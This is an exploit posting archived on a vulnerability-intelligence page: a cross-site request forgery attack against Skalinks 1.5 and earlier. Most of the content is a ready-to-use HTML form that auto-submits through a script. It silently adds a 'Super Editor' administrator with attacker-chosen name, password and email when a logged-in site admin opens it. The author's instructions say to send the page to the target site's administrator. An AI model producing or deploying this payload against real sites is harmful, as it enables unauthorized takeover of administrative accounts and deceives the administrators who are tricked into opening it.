Lucene search
skalinks-csrf.txt
skalinks csrf exploit to add admin through HTML for
Show more
`##########################################################################
# _ _ _ _ _____ _ _ #
# | | | | | | (_) |_ _| (_) | | #
# | |_| | __ _ ___| | ___ _ __ __ _ | | _ __ ___ _ __| | ___ #
# | _ |/ _` |/ __| |/ / | '_ \ / _` | | || '_ \/ __| |/ _` |/ _ \ #
# | | | | (_| | (__| <| | | | | (_| | _| || | | \__ \ | (_| | __/ #
# \_| |_/\__,_|\___|_|\_\_|_| |_|\__, | \___/_| |_|___/_|\__,_|\___| #
# __/ | #
# |___/ #
#________________________________________________________________________#
| |
| Site: www.hackinginside.altervista.org |
| Project: Skalinks <= 1_5 Cross Site Request Forgery Add Admin |
| Author: Vincy |
| Email: [email protected] |
|________________________________________________________________________|
This code, must be saved in a HTML page and sended to the site admin. So the admin will add a new admin in the mySQL with that info.
It work only if admin's logged.
-------------------------------------------------------------------------------------------
<form action="http://site.com/path/admin/admin_account.php" name="add_admin" method="post">
<input type="text" name="admin_name" value="[ NOME ]">
<input type="text" name="admin_password" value="[ PASSWORD ]">
<input type="text" name="admin_email" value="[ EMAIL ]">
<select name="admin_type"><option value="2">Super Editor</option></select>
<input type=hidden name="Add_admin" value="Add Admin">
</form>
<script>document.add_admin.submit()</script>
-------------------------------------------------------------------------------------------
# Vincy - Hacking Inside Crew
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo05 Nov 2007 00:00Current
7.4High risk
Vulners AI Score7.4